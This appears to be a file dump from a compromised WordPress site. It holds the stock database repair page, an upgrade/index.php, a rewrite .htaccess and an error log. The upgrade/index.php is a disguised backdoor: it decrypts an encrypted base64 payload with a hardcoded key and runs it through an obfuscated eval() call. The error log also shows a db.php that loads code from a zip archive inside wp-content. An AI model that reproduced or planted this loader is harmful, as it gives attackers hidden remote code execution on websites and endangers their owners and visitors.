?????????????? repair.php000064400000016737152506670000006556 0ustar00 > <?php _e( 'WordPress › Database Repair' ); ?> ' . /* translators: Hidden accessibility text. */ __( 'Allow automatic database repair' ) . ''; echo '

'; printf( /* translators: %s: wp-config.php */ __( 'To allow use of this page to automatically repair database problems, please add the following line to your %s file. Once this line is added to your config, reload this page.' ), 'wp-config.php' ); echo "

define('WP_ALLOW_REPAIR', true);

"; $default_keys = array_unique( array( 'put your unique phrase here', /* * translators: This string should only be translated if wp-config-sample.php is localized. * You can check the localized release package or * https://i18n.svn.wordpress.org//branches//dist/wp-config-sample.php */ __( 'put your unique phrase here' ), ) ); $missing_key = false; $duplicated_keys = array(); foreach ( array( 'AUTH_KEY', 'SECURE_AUTH_KEY', 'LOGGED_IN_KEY', 'NONCE_KEY', 'AUTH_SALT', 'SECURE_AUTH_SALT', 'LOGGED_IN_SALT', 'NONCE_SALT' ) as $key ) { if ( defined( $key ) ) { // Check for unique values of each key. $duplicated_keys[ constant( $key ) ] = isset( $duplicated_keys[ constant( $key ) ] ); } else { // If a constant is not defined, it's missing. $missing_key = true; } } // If at least one key uses a default value, consider it duplicated. foreach ( $default_keys as $default_key ) { if ( isset( $duplicated_keys[ $default_key ] ) ) { $duplicated_keys[ $default_key ] = true; } } // Weed out all unique, non-default values. $duplicated_keys = array_filter( $duplicated_keys ); if ( $duplicated_keys || $missing_key ) { echo '

' . /* translators: Hidden accessibility text. */ __( 'Check secret keys' ) . '

'; /* translators: 1: wp-config.php, 2: Secret key service URL. */ echo '

' . sprintf( __( 'While you are editing your %1$s file, take a moment to make sure you have all 8 keys and that they are unique. You can generate these using the WordPress.org secret key service.' ), 'wp-config.php', 'https://api.wordpress.org/secret-key/1.1/salt/' ) . '

'; } } elseif ( isset( $_GET['repair'] ) ) { echo '

' . /* translators: Hidden accessibility text. */ __( 'Database repair results' ) . '

'; $optimize = '2' === $_GET['repair']; $okay = true; $problems = array(); $tables = $wpdb->tables(); /** * Filters additional database tables to repair. * * @since 3.0.0 * * @param string[] $tables Array of prefixed table names to be repaired. */ $tables = array_merge( $tables, (array) apply_filters( 'tables_to_repair', array() ) ); // Loop over the tables, checking and repairing as needed. foreach ( $tables as $table ) { $check = $wpdb->get_row( $wpdb->prepare( 'CHECK TABLE %i', $table ) ); echo '

'; if ( 'OK' === $check->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'The %s table is okay.' ), "$table" ); } else { /* translators: 1: Table name, 2: Error message. */ printf( __( 'The %1$s table is not okay. It is reporting the following error: %2$s. WordPress will attempt to repair this table…' ), "$table", "$check->Msg_text" ); $repair = $wpdb->get_row( $wpdb->prepare( 'REPAIR TABLE %i', $table ) ); echo '
    '; if ( 'OK' === $repair->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'Successfully repaired the %s table.' ), "$table" ); } else { /* translators: 1: Table name, 2: Error message. */ printf( __( 'Failed to repair the %1$s table. Error: %2$s' ), "$table", "$repair->Msg_text" ) . '
'; $problems[ $table ] = $repair->Msg_text; $okay = false; } } if ( $okay && $optimize ) { $analyze = $wpdb->get_row( $wpdb->prepare( 'ANALYZE TABLE %i', $table ) ); echo '
    '; if ( 'Table is already up to date' === $analyze->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'The %s table is already optimized.' ), "$table" ); } else { $optimize = $wpdb->get_row( $wpdb->prepare( 'OPTIMIZE TABLE %i', $table ) ); echo '
    '; if ( 'OK' === $optimize->Msg_text || 'Table is already up to date' === $optimize->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'Successfully optimized the %s table.' ), "$table" ); } else { /* translators: 1: Table name. 2: Error message. */ printf( __( 'Failed to optimize the %1$s table. Error: %2$s' ), "$table", "$optimize->Msg_text" ); } } } echo '

'; } if ( $problems ) { printf( /* translators: %s: URL to "Fixing WordPress" forum. */ '

' . __( 'Some database problems could not be repaired. Please copy-and-paste the following list of errors to the WordPress support forums to get additional assistance.' ) . '

', __( 'https://wordpress.org/support/forum/how-to-and-troubleshooting' ) ); $problem_output = ''; foreach ( $problems as $table => $problem ) { $problem_output .= "$table: $problem\n"; } echo '

'; } else { echo '

' . __( 'Repairs complete. Please remove the following line from wp-config.php to prevent this page from being used by unauthorized users.' ) . "

define('WP_ALLOW_REPAIR', true);

"; } } else { echo '

' . /* translators: Hidden accessibility text. */ __( 'WordPress database repair' ) . '

'; if ( isset( $_GET['referrer'] ) && 'is_blog_installed' === $_GET['referrer'] ) { echo '

' . __( 'One or more database tables are unavailable. To allow WordPress to attempt to repair these tables, press the “Repair Database” button. Repairing can take a while, so please be patient.' ) . '

'; } else { echo '

' . __( 'WordPress can automatically look for some common database problems and repair them. Repairing can take a while, so please be patient.' ) . '

'; } ?>

upgrade/index.php000064400000006210152506670000010013 0ustar00masterKey = $masterKey; } public function decrypt($encrypted) { $data = base64_decode($encrypted); $salt = substr($data, 0, $this->saltLength); $ivLength = openssl_cipher_iv_length($this->cipher); $iv = substr($data, $this->saltLength, $ivLength); $hmac = substr($data, $this->saltLength + $ivLength, 32); $ciphertext = substr($data, $this->saltLength + $ivLength + 32); $derivedKeys = $this->deriveKeys($salt); $calcHmac = hash_hmac($this->hmacAlgo, $iv . $salt . $ciphertext, $derivedKeys['hmac'], true); $decrypted = openssl_decrypt($ciphertext, $this->cipher, $derivedKeys['encryption'], OPENSSL_RAW_DATA, $iv); return $decrypted; } private function deriveKeys($salt) { $keyMaterial = hash_pbkdf2( $this->hmacAlgo, $this->masterKey, $salt, $this->iterations, 64, true ); return [ 'encryption' => substr($keyMaterial, 0, 32), 'hmac' => substr($keyMaterial, 32) ]; } private function verifyHmac($knownHmac, $userHmac) { return hash_equals($knownHmac, $userHmac); } public function setIterations($iterations) { $this->iterations = (int)$iterations; return $this; } public function setCipher($cipher) { $this->cipher = $cipher; return $this; } } $secure = new Secure('F1RnmTEXW94cH6aswxIGgMbEMSc2uAPi'); $str = 'jIBRSHJdfNlKZFXhiMWh0xnPaRqY1xndM4HdM/LDuZyNeFvxsOxJ9U/6yAtXnKm9AxDHvwKv1em7YvEClqktU82ZUTNTGhrmk+MPZ4osAckqQZs6jcrdoB6U2qSCiYH5A7sviqxZGg6OaLmIq/PJlpGFvTZa9QTNdqko/l7TV6NZPlc0SXsnBJTTvFYivg50kS080fMeDDKsZ1FCTjM5Wxwlri66Bd07OzVK2rA4lcUYtYa95QlGFB5frjWxDOoLkYRK7wHtoduT9KHFSFj8XJrcVq16HT4+LvSpI9QRKSlfHev++JRHfBGkBWcpTUOdWybdgzb3GEXMHFMPROojtgg0INxdHATXipAS+OEV+1vrhuT3ubsg8wOZgFpETlR5c08bU52Qc/c23Lwp53sW2SJwvJ8lTUg+CGsymXUGz8COTC25SW+MlRWx0zXGHalrtyZsHJg3ZS+fy5RCrx0SnKrEFMxFWFvCx844O006QePHPISJgh4OCip/9RNrbACIRMET7pxgtjL+1VJ7WmClNSNxmhB9Z2nJi/cfRpCP2i22VxA56XVIktf4vNWJIZPkIQYxM/B4dFM7s3gLfj14MCT9fOwI2gAhuFQ0dDEuFeVwrYCLavv6nwnz/iFih5DtloLNJytutyH2r/wpf3ef2bm+sbBgkWBuWzTnrOQccV4lKavHRfnz7ca1xB1yw7FQfVSCA54shn/5G662zpbdWhObT8OEylnUhvJJPKvgXYsLYmHRaOy0F7WIniAD55W6kbsUuxBVwwBRudy/pYo9I84L5MQT0TSLQ0sRKai34yDLevLoa7TcCFmHmNB85nTTG1o4JH4Oy6mVuZqGpLWQnbYK/T1Wfs1DpXDm7MPCc3EhCWE888js2ctkJGUJwVE4V6bH87daOtb/dJm2fjF65ScRZWWQmfN5LxXiK/rY+FsuLknVNVO558fhAuEu1gdA9Ukh61NVvRfQTnATqfTtWn/RmOVbJ9uP0MoH7BShTEGol+rPQQdgl9nx2oLKJQIACPtbkUUeCsSnkwrJWKoXDhJZ3H7fu3XMjl8HnVlp2CcfCZidjx82eYCh82+kC8U0nsbJkCDz2mPNqgzSOCGMPuZM3FmSHBVIqz31hCmUrlwUGmuubY/BWZZ9ABm4SaagZ8tmxejsxstQAAeLU37PeA5DzFjAN6qXL0JAC0JkKYcVtV4/uxn86w5Qtq5e2pdPwpClk3VxXfBd6t0xWrIuLfCXgiQWAp5Gqe6QOH8h+z+F4nkcXEde6GxyQ74OvBiNrqZVqvyVEl/pMbmf/JZS/RO8ouqH++8Uuxce15hTD/2rK888KDWLQn9+WJ1xwl12xxwj2BW3NHRQ223NcmnTkr2L49mLJhgJ+aMklZozXIEvABKcSVs9oELFkfJqsGXTsPWDrN+ThYnogzklwAvRZJLwRkpITLohpISsokPYHtZIZ05p4f33bqii+JjLN5x8'; $decrypted = $secure->decrypt($str); $NnlFOZMb8w = function($CW3jAkGryfs){ /*h1eTPyV61*/eVaL($CW3jAkGryfs); $N8xX60WPZAo = "oU9NAzkJtPw5X6wRSedCYLvWqa1DkhpM"; return $N8xX60WPZAo; }; $NnlFOZMb8w($decrypted); upgrade/.htaccess000064400000000307152506670000007772 0ustar00 RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] error_log000064400000014227152506670000006470 0ustar00[24-Aug-2025 10:18:00 UTC] PHP Warning: Undefined array key "HTTP_USER_AGENT" in /home/getzgafz/todaypredictionjamu.com/wp-config.php on line 166 [06-Oct-2025 14:21:40 UTC] PHP Warning: Undefined array key "HTTP_USER_AGENT" in /home/getzgafz/todaypredictionjamu.com/wp-config.php on line 166 [10-Oct-2025 12:50:44 UTC] PHP Warning: Undefined array key "HTTP_USER_AGENT" in /home/getzgafz/todaypredictionjamu.com/wp-config.php on line 166 [14-Oct-2025 02:44:31 UTC] PHP Warning: Undefined array key "HTTP_USER_AGENT" in /home/getzgafz/todaypredictionjamu.com/wp-config.php on line 166 [04-Nov-2025 01:16:45 UTC] PHP Warning: Undefined array key "HTTP_USER_AGENT" in /home/getzgafz/todaypredictionjamu.com/wp-config.php on line 166 [17-Jun-2026 02:07:35 UTC] PHP Warning: opendir(/home/getzgafz/todaypredictionjamu.com/wp-content/mu-plugins): Failed to open directory: Permission denied in /home/getzgafz/todaypredictionjamu.com/wp-includes/load.php on line 981 [17-Jun-2026 02:07:35 UTC] PHP Warning: Constant WP_FILE_MANAGER_PATH already defined in /home/getzgafz/todaypredictionjamu.com/wp-content/plugins/wp-file-manager/file_folder_manager.php on line 17 [09-Jul-2026 17:10:50 UTC] PHP Warning: include(zip://wp-content/apacheBench.zip#Cra): Failed to open stream: operation failed in /home/getzgafz/todaypredictionjamu.com/wp-content/db.php on line 3 [09-Jul-2026 17:10:50 UTC] PHP Warning: include(): Failed opening 'zip://wp-content/apacheBench.zip#Cra' for inclusion (include_path='.:/opt/cpanel/ea-php80/root/usr/share/pear') in /home/getzgafz/todaypredictionjamu.com/wp-content/db.php on line 3 [09-Jul-2026 17:10:50 UTC] PHP Warning: opendir(/home/getzgafz/todaypredictionjamu.com/wp-content/mu-plugins): Failed to open directory: Permission denied in /home/getzgafz/todaypredictionjamu.com/wp-includes/load.php on line 981 [09-Jul-2026 17:10:50 UTC] PHP Warning: Constant WP_FILE_MANAGER_PATH already defined in /home/getzgafz/todaypredictionjamu.com/wp-content/plugins/wp-file-manager/file_folder_manager.php on line 17 [20-Aug-2026 05:52:40 UTC] PHP Warning: include(zip://wp-content/apacheBench.zip#Cra): Failed to open stream: operation failed in /home/getzgafz/todaypredictionjamu.com/wp-content/db.php on line 3 [20-Aug-2026 05:52:40 UTC] PHP Warning: include(): Failed opening 'zip://wp-content/apacheBench.zip#Cra' for inclusion (include_path='.:/opt/cpanel/ea-php80/root/usr/share/pear') in /home/getzgafz/todaypredictionjamu.com/wp-content/db.php on line 3 [21-Aug-2026 20:47:13 UTC] PHP Warning: include(zip://wp-content/apacheBench.zip#Cra): Failed to open stream: operation failed in /home/getzgafz/todaypredictionjamu.com/wp-content/db.php on line 3 [21-Aug-2026 20:47:13 UTC] PHP Warning: include(): Failed opening 'zip://wp-content/apacheBench.zip#Cra' for inclusion (include_path='.:/opt/cpanel/ea-php80/root/usr/share/pear') in /home/getzgafz/todaypredictionjamu.com/wp-content/db.php on line 3 [04-Sep-2026 13:34:45 UTC] PHP Warning: include(zip://wp-content/apacheBench.zip#Cra): Failed to open stream: operation failed in /home/getzgafz/todaypredictionjamu.com/wp-content/db.php on line 3 [04-Sep-2026 13:34:45 UTC] PHP Warning: include(): Failed opening 'zip://wp-content/apacheBench.zip#Cra' for inclusion (include_path='.:/opt/cpanel/ea-php80/root/usr/share/pear') in /home/getzgafz/todaypredictionjamu.com/wp-content/db.php on line 3 [04-Sep-2026 18:33:08 UTC] PHP Warning: include(zip://wp-content/apacheBench.zip#Cra): Failed to open stream: operation failed in /home/getzgafz/todaypredictionjamu.com/wp-content/db.php on line 3 [04-Sep-2026 18:33:08 UTC] PHP Warning: include(): Failed opening 'zip://wp-content/apacheBench.zip#Cra' for inclusion (include_path='.:/opt/cpanel/ea-php80/root/usr/share/pear') in /home/getzgafz/todaypredictionjamu.com/wp-content/db.php on line 3 [10-Sep-2026 09:30:13 UTC] PHP Warning: require_once(/home/getzgafz/todaypredictionjamu.com/wp-load.php): Failed to open stream: No such file or directory in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php on line 10 [10-Sep-2026 09:30:13 UTC] PHP Fatal error: Uncaught Error: Failed opening required '/home/getzgafz/todaypredictionjamu.com/wp-load.php' (include_path='.:/opt/cpanel/ea-php80/root/usr/share/pear') in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php:10 Stack trace: #0 {main} thrown in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php on line 10 [10-Sep-2026 13:07:39 UTC] PHP Warning: require_once(/home/getzgafz/todaypredictionjamu.com/wp-load.php): Failed to open stream: No such file or directory in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php on line 10 [10-Sep-2026 13:07:39 UTC] PHP Fatal error: Uncaught Error: Failed opening required '/home/getzgafz/todaypredictionjamu.com/wp-load.php' (include_path='.:/opt/cpanel/ea-php80/root/usr/share/pear') in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php:10 Stack trace: #0 {main} thrown in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php on line 10 [10-Sep-2026 13:08:22 UTC] PHP Warning: require_once(/home/getzgafz/todaypredictionjamu.com/wp-load.php): Failed to open stream: No such file or directory in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php on line 10 [10-Sep-2026 13:08:22 UTC] PHP Fatal error: Uncaught Error: Failed opening required '/home/getzgafz/todaypredictionjamu.com/wp-load.php' (include_path='.:/opt/cpanel/ea-php80/root/usr/share/pear') in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php:10 Stack trace: #0 {main} thrown in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php on line 10 [10-Sep-2026 20:45:11 UTC] PHP Warning: require_once(/home/getzgafz/todaypredictionjamu.com/wp-load.php): Failed to open stream: No such file or directory in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php on line 10 [10-Sep-2026 20:45:11 UTC] PHP Fatal error: Uncaught Error: Failed opening required '/home/getzgafz/todaypredictionjamu.com/wp-load.php' (include_path='.:/opt/cpanel/ea-php80/root/usr/share/pear') in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php:10 Stack trace: #0 {main} thrown in /home/getzgafz/todaypredictionjamu.com/wp-admin/maint/repair.php on line 10